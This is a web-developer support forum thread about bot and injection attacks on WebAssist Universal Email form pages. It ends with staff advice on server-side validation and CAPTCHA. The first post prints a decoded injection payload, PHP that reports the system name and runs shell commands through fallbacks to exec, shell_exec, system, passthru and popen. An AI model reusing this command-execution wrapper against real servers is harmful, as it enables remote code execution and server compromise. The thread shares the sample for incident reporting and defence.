Security in UE - eval(base64_decode(( Hack

Got a number of emails from one of my UE (latest version) form submissions using the supplied template blank.php today. They were all subject to an attack where a eval(base64_decode string was sent via form email.

Decoded the malicious code produces this result:

echo "v0pCr3w<br>";
echo "sys:".php_uname()."<br>";
$cmd="echo nob0dyCr3w";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

This looks like an attempt to find entry, though I am starting the process of scanning my server for any unauthorized access/uploads.

Question: is Universal Email secure against such Hack attempts?

I usually use a form text field that is positioned off screen via css and IF populated, do not process the form (basic Honeypot screening).

But IF there are other things that we should all be doing to protect our sites, and if there are any security concerns related to the WebAssist extensions, it would be helpful for this to be published.

Any comments from Web Assist staff?

On any public form where you are gathering input from form submission, you should be using the server validation included in either Form Toolkit or CSS form builder to validate the data being entered.

Use email form validation for email form elements

use alpha numeric validation for comments boxes

using alpha numeric validation will prevent php code from being entered as it will fail if characters like ">" "<" or "?" are entered

there are a number of other validation types that can be used to secure your forms.

Thanks for the reply Jason.

I can't help but think is would still be a good idea for you guys to have a separate page or area on your site to make sure people using your extensions are also aware of the proper means of security in developing web sites. Seems every day the Black Hats are working that much hard to cause problems for Developers.

We have found that in all the places we have used WebAssist email, forms and or insert behaviors Bots have now found ways to exploit them. I don't have anything by anecdotal proof, which is out of 50+ websites we dev and manage, the 23 that have the WA email are being hammered by the form bots.

CAPTCHA, Honeypots, and simple JS checking is rendered meaningless by the bots. Unless Web Assist can come with the an answer, the only course of action is to replace the Web Assist forms/email/error checking. We have replaced the code on about half the sites and the bots have been held at bay for a over a week. (they were hitting the form 50 times a day).

I don't post this to be harsh to WA, just honestly looking for a solution outside of removing WA code.

provide a copy of one of pages.


Javascript validation is not intended as a means of preventing bots from filling in forms. It is intended to give the user feedback while filling in the form.

Server validation is the means to use to prevent bots from spamming your form. make sure that the server validation behavior and the Universal Email behavior are both using the same trigger. if they use different triggers, it can be possible to work around the validation but still send the email.


NOTE: you also posted in another thread. Posting the same problem in multiple places causes confusion, it is best to start your own thread for issues to have them resolved.

Originally Said By: Jason Byrnes

  you should be using the server validation included in either Form Toolkit or CSS form builder to validate the data being entered.  

Jason,
I already have the HTML Editor extension so Form Builder is my best path to be able to sanitize and validate firm field data?

Is one of these extensions over the other to be updated more in the future> Any planned obsolecense I should know of now so I'm not disappointed later?

Form Toolkit can be used to add CAPTCHA to existing forms and add validation.

There are no immediate plans for paid updates to any of these products at the moment.